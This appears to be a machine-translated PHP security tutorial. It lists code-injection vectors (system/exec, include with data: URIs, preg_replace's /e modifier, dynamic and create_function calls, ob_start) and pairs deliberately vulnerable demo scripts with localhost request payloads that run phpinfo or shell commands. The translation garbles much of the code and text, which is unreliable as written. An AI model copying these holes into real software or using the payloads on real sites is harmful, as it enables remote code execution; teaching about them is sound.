A code execution function
PHP function that can execute code. If eval (), assert (),``, system (), exec (), shell_exec (), passthru (), escapeshellcmd (), pcntl_exec (), etc.
demo code 1.1:
<? Php
echo `dir`;
?>
Second file contains the code injection
File contains the function code injection under certain conditions, such as the include (), include_once (), require (), require_once ().
When allow_url_include = On, PHP Version> = 5.2.0, the result code injection.
demo code 2.1:
<? Php
include ($ _GET ['a']);
?>
Access http://127.0.0.1/include.php?a=data:text/plain,% 3C? Php% 20phpinfo% 28% 29;?% 3E or
Implementation of the phpinfo ().
3 is the matching code injection
Known preg_replace () function causes the code injection. When the pattern exists / e pattern modifier, which allows code execution. Here we discuss three cases under sub-
3.1 preg_replace () pattern parameter injection
pattern that the first parameter of the code injection.
When magic_quotes_gpc = Off, the cause code execution.
demo code 3.1:
<? Php
echo $ regexp = $ _GET ['reg'];
$ Var = '<php> phpinfo () </ php>';
preg_replace ("/ <php> (.*?)$ regexp", '\ \ 1', $ var);
?>
Access http://127.0.0.1/preg_replace1.php?reg =% 3C \ / php% 3E / e that is
Implementation of the phpinfo ().
3.2 preg_replace () replacement parameter injection
replacement of the second parameter of the code injection, resulting in code execution.
demo code 3.2:
<?
preg_replace ("/ menzhi007 / e", $ _GET ['h'], "jutst test");
?>
When we submit http://127.0.0.1/preg_replace2.php?h=phpinfo () or
Implementation of the phpinfo ().
3.3 preg_replace () third parameter injection
We are subject parameters by constructing the code. Author: http://127.0.0.1/preg_replace3.php?h = [php] phpinfo () [/ php]
Or http://127.0.0.1/preg_replace3.php?h = [php] $ (phpinfo% 28% 29) [/ php] lead to code execution
demo code 3.3:
<?
preg_replace ("/ \ s * \ [php \ ](.+?) \ [\ / php \] \ s * / ies", "\ \ 1", $ _GET ['h']);
?>
4 Dynamic code execution
4.1 Dynamic variable code execution
demo code 4.1:
<? Php
$ Dyn_func = $ _GET ['dyn_func'];
$ Argument = $ _GET ['argument'];
$ Dyn_func ($ argument);
?>
We presented the implementation of ipconfig command http://127.0.0.1/dyn_func.php?dyn_func=system&argument=ipconfig
4.2 Dynamic function code execution
demo code 4.2:
<? Php
$ Foobar = $ _GET ['foobar'];
$ Dyn_func = create_function ('$ foobar', "echo $ foobar;");
$ Dyn_func ('');
?>
We submit http://127.0.0.1/create_function.php?foobar=system% 28dir% 29 implementation of the dir command
Five other
5.1 ob_start () function code execution
demo code 5.1:
<? Php
$ Foobar = 'system';
ob_start ($ foobar);
echo 'dir';
ob_end_flush ();
?>
5.2 array_map () function code execution
Other pages: : 1 * 2 * Next>>
|